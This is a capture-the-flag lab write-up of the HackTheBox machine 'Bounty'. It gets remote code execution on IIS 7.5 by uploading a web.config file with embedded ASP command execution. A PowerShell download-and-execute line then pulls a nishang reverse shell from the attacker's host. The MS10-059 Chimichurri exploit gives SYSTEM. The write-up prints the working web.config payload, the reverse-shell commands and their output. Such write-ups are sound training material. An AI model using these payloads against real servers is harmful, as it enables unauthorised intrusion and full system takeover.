tl;dr

  • RCE by uploading web.config
  • Windows IIS 7.5
  • MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege

Solved by: 7h3M0nk

Bounty is a Windows box with IP 10.10.10.93. It’s been a while since I did a windows box. This box taught me some important powershell one liners which can be used to upload strings and files.

Initial Analysis

Doing a basic port scan.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

┌──(kali㉿kali)-[~/HackTheBox/Bounty/10.10.10.93/nmap]
└─$ cat Basic_10.10.10.93.nmap
# Nmap 7.91 scan initiated Wed Feb 17 02:36:57 2021 as: nmap -Pn -sCV -p80 -oN nmap/Basic_10.10.10.93.nmap 10.10.10.93
Nmap scan report for 10.10.10.93
Host is up (0.33s latency).

PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 17 02:37:13 2021 -- 1 IP address (1 host up) scanned in 16.30 seconds

MS IIS 7.5, I have some previous experinece dealing with IIS servers, let’s add the service to the hosts.

1
2
3
4
5
6
7
8
9
10
11
12
13

┌──(kali㉿kali)-[~/HackTheBox/Bounty/10.10.10.93/nmap]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
10.10.10.17 sup3rs3crt.brainfuck.htb www.brainfuck.htb brainfuck.htb
10.10.10.13 cronos.htb admin.cronos.htb
10.10.10.43 nineveh.htb
10.10.10.45 box.htb
10.10.10.25 wdac.htb
10.10.10.216 laboratory.htb
10.10.10.68 bashed.htb
10.10.10.93 bounty.htb

Opening bounty.htb.

IIS

Checking the page source also didn’t give me much information.

Next step will be to fuzz for directories and files. As it is a IIS server, I will be looking for aspx files.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

┌──(kali㉿kali)-[~/HackTheBox/Bounty/recon]
└─$ gobuster dir -u http://bounty.htb -x aspx -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://bounty.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: aspx
[+] Timeout: 10s
===============================================================
2021/03/27 08:09:55 Starting gobuster in directory enumeration mode
===============================================================
/aspnet_client (Status: 301) [Size: 155] [--> http://bounty.htb/aspnet_client/]
/transfer.aspx (Status: 200) [Size: 941]
/uploadedfiles (Status: 301) [Size: 155] [--> http://bounty.htb/uploadedfiles/]

===============================================================
2021/03/27 08:13:00 Finished
===============================================================

transfer.aspx looks interesting.

Transfer

I will be able to upload files to the server, nice. Is there any RCE based on file uploads in IIS 7.5? A quick search landed me into a blog post which shows that uploading a web.config file containg asp code can be used to execute remote commands.

Exploit

First setup will be to confirm if I will be able to upload a web.config file and check if RCE is possible. Once uploaded, the config file might be present in the uploadedfiles directory.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
┌──(kali㉿kali)-[~/HackTheBox/Bounty/exploit]
└─$ cat web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
<appSettings>
</appSettings>
</configuration>
<!–-
<% Response.write("-"&"->")
Response.write("<pre>")
Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("net user")
output1 = cmd1.StdOut.Readall()
set cmd1 = nothing: Set wShell1 = nothing
Response.write(output1)
Response.write("</pre><!-"&"-") %>
-–>

RCE

Yeah!! It works. Time to pop a reverese shell. I will be using powershell for this. Tried using different paylods, the implementation from nishang worked. Added a line to invoke the shell at the end.

1
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.2 -Port 4242

Need to make some changes to the web.config file.

1
2

Set cmd1 = wShell1.Exec("cmd /c powershell IEX (New-Object Net.WebClient).downloadstring('http://10.10.14.2:8000/reverse.ps1')")

This will allow me to download the reverse shell as a string and then execute it.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

┌──(kali㉿kali)-[~]
└─$ curl -v http://10.10.10.93/uploadedfiles/web.config
* Trying 10.10.10.93:80...
* Connected to 10.10.10.93 (10.10.10.93) port 80 (#0)
> GET /uploadedfiles/web.config HTTP/1.1
> Host: 10.10.10.93
> User-Agent: curl/7.72.0
> Accept: */*
>

┌──(kali㉿kali)-[~/HackTheBox/Bounty/exploit]
└─$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.93 - - [27/Mar/2021 23:47:46] "GET /reverse.ps1 HTTP/1.1" 200 -
1
2
3
4
5
6
7
8
9
10

┌──(kali㉿kali)-[~/HackTheBox/Bounty/exploit]
└─$ nc -nvlp 4242
listening on [any] 4242 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.93] 49168
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>cd C:\Users\merlin\Desktop
PS C:\Users\merlin\Desktop> type user.txt

Owned user, Moving on to Root.

PrivEsc

Let’s get the system info and check it with the windows-exploit-suggester.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41

PS C:\Users\merlin\Desktop> systeminfo

Host Name: BOUNTY
OS Name: Microsoft Windows Server 2008 R2 Datacenter
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-402-3606965-84760
Original Install Date: 5/30/2018, 12:22:24 AM
System Boot Time: 3/27/2021, 9:51:36 AM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,676 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,369 MB
Virtual Memory: In Use: 726 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.93

Checking with exploit suggester, got to know that we got multiple means to do privesc.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

┌──(kali㉿kali)-[~/HackTheBox/Bounty/exploit]
└─$ cat exploitsuggester.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 0 hotfix(es) against the 197 potential bulletins(s) with a database of 137 known exploits
[*] there are now 197 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2008 R2 64-bit'
[*]
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[M] MS13-005: Vulnerability in Windows Kernel-Mode Driver Could Allow Elevation of Privilege (2778930) - Important
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[E] MS10-059: Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege (982799) - Important
[E] MS10-047: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (981852) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical

Trying out each exploit to check if any work, the MS10-059 worked. To upload the executable, I had to traverse to a directory which allowed creation of a file.

1
2

C:\Users\merlin\AppData\Local\Temp

Now let’s modify the config file to upload the file and save it to the above mentioned directory.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48

PS C:\Users\merlin\AppData\Local\Temp> (New-Object Net.WebClient).downloadfile('http://10.10.14.2:8000/privesc.exe', 'C:\Users\merlin\AppData\Local\Temp\privesc.exe')

PS C:\Users\merlin\AppData\Local\Temp> dir


Directory: C:\Users\merlin\AppData\Local\Temp


Mode LastWriteTime Length Name
---- ------------- ------ ----
d---- 5/30/2018 12:24 AM HWI29DD.tmp.dir
d---- 5/30/2018 12:22 AM Low
d---- 5/30/2018 4:42 AM vmware-merlin
d---- 5/30/2018 12:22 AM {2200E27C-064E-4F0D-A6B3-4A757BE0C
BDF}~setup
-a--- 5/30/2018 5:49 AM 31832 merlin.bmp
-a--- 3/27/2021 7:43 PM 784384 privesc.exe
-a--- 5/30/2018 12:13 AM 79848 storePwd.exe
-a--- 5/30/2018 12:13 AM 24 storePwd.ini
-a--- 5/30/2018 12:13 AM 555 unattend.cmd
-a--- 5/30/2018 12:13 AM 608744 upgrader.exe
-a--- 5/30/2018 12:33 AM 194894 vminst.log
-a--- 5/30/2018 12:24 AM 3292920 vmmsi.log


PS C:\Users\merlin\AppData\Local\Temp> ./privesc.exe
/Chimichurri/-->This exploit gives you a Local System shell <BR>/Chimichurri/-->Usage: Chimichurri.exe ipaddress port <BR>
PS C:\Users\merlin\AppData\Local\Temp> ./privesc.exe 10.10.14.2 4241



┌──(kalikali)-[~/HackTheBox/Bounty/exploit]
└─$ nc -nvlp 4241
listening on [any] 4241 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.93] 49171
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Users\merlin\AppData\Local\Temp>whoami
whoami
nt authority\system

C:\Users\merlin\AppData\Local\Temp>cd C:\Users\Administrator\Desktop
cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop>type root.txt
type root.txt

And that is how I pwned Bounty!